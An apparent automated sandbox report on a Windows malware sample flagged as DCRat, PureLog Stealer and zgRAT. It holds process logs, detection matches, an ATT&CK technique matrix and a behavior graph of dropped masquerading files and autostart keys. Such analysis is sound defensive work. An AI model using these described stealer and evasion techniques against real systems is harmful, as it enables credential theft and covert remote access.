                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeQueries volume information: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe VolumeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeQueries volume information: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe PID: 6700, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe PID: 6700, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.a60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts11
                          Windows Management Instrumentation                          		1
                          Scripting                          		11
                          Process Injection                          		32
                          Masquerading                          		OS Credential Dumping11
                          Security Software Discovery                          		1
                          Taint Shared Content                          		11
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job41
                          Registry Run Keys / Startup Folder                          		41
                          Registry Run Keys / Startup Folder                          		11
                          Disable or Modify Tools                          		LSASS Memory1
                          Process Discovery                          		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		31
                          Virtualization/Sandbox Evasion                          		Security Account Manager31
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets2
                          File and Directory Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                          Obfuscated Files or Information                          		Cached Domain Credentials14
                          System Information Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Software Packing                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                          File Deletion                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1510313 Sample: 4ceb69afc05b1475459075f2cd5... Startdate: 12/09/2024 Architecture: WINDOWS Score: 100 57 Suricata IDS alerts for network traffic 2->57 59 Antivirus detection for dropped file 2->59 61 Antivirus / Scanner detection for submitted sample 2->61 63 13 other signatures 2->63 7 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe 10 41 2->7         started        11 XrtbrRarCSNElLBNKqySVVhxSZIi.exe 3 2->11         started        13 XrtbrRarCSNElLBNKqySVVhxSZIi.exe 2 2->13         started        15 4 other processes 2->15 process3 file4 49 C:\...\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, PE32 7->49 dropped 51 C:\Users\user\Desktop\ynMPgItS.log, PE32 7->51 dropped 53 C:\Users\user\Desktop\yEThvdnU.log, PE32 7->53 dropped 55 14 other malicious files 7->55 dropped 69 Creates an undocumented autostart registry key 7->69 71 Creates autostart registry keys with suspicious names 7->71 73 Creates multiple autostart registry keys 7->73 75 3 other signatures 7->75 17 csc.exe 4 7->17         started        21 csc.exe 4 7->21         started        23 powershell.exe 7->23         started        25 18 other processes 7->25 signatures5 process6 file7 45 C:\Program Files (x86)\...\msedge.exe, PE32 17->45 dropped 65 Infects executable files (exe, dll, sys, html) 17->65 27 conhost.exe 17->27         started        29 cvtres.exe 1 17->29         started        47 C:\Windows\...\SecurityHealthSystray.exe, PE32 21->47 dropped 31 conhost.exe 21->31         started        33 cvtres.exe 1 21->33         started        67 Loading BitLocker PowerShell Module 23->67 35 conhost.exe 23->35         started        37 conhost.exe 25->37         started        39 conhost.exe 25->39         started        41 conhost.exe 25->41         started        43 17 other processes 25->43 signatures8 process9

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe63%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe100%AviraTR/Spy.Agent.hwiyw
                          4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe100%AviraTR/Spy.Agent.hwiyw
                          C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe100%AviraTR/Spy.Agent.hwiyw
